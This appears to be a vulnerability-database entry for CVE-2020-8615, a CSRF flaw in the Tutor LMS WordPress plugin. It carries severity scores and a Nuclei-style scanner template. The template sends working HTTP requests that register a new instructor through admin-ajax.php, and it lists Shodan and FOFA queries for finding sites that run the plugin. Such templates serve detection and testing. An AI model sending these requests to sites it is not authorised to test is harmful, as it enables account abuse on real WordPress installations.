2.6 Low
CVSS2
Attack Vector
NETWORK
Attack Complexity
HIGH
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:H/Au:N/C:N/I:P/A:N
6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
0.009 Low
EPSS
Percentile
82.5%
A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).
id: CVE-2020-8615
info:
name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery
author: r3Y3r53
severity: medium
description: |
A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).
remediation: update to v.1.5.3
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-8615
- https://wpscan.com/vulnerability/10058
- http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html
- https://wpvulndb.com/vulnerabilities/10058
- https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
cvss-score: 6.5
cve-id: CVE-2020-8615
cwe-id: CWE-352
epss-score: 0.00867
epss-percentile: 0.82331
cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: themeum
product: tutor_lms
framework: wordpress
shodan-query: http.html:/wp-content/plugins/tutor/
fofa-query: body=/wp-content/plugins/tutor/
publicwww-query: /wp-content/plugins/tutor/
tags: cve,cve2020,wpscan,packetstorm,csrf,wp-plugin,wp,tutor,wordpress,themeum
variables:
user: "{{rand_base(6)}}"
pass: "{{rand_base(8)}}"
email: "{{randstr}}@{{rand_base(5)}}.com"
firstname: "{{rand_base(5)}}"
lastname: "{{rand_base(5)}}"
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor
matchers:
- type: dsl
dsl:
- 'contains(content_type_2, "application/json")'
- 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")'
- 'status_code_2 == 200'
condition: and
# digest: 4b0a00483046022100b166c170e0f5e124dfa59d0bf684f25282fd9fd1969e30f06e4a791b03945e29022100a6c6d3bb31891aecbc37d14c7edc9a799013c2041772b04eb43a9192e5bb97d9:922c64590222798bb761d5b6d8e72950
2.6 Low
CVSS2
Attack Vector
NETWORK
Attack Complexity
HIGH
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:H/Au:N/C:N/I:P/A:N
6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
0.009 Low
EPSS
Percentile
82.5%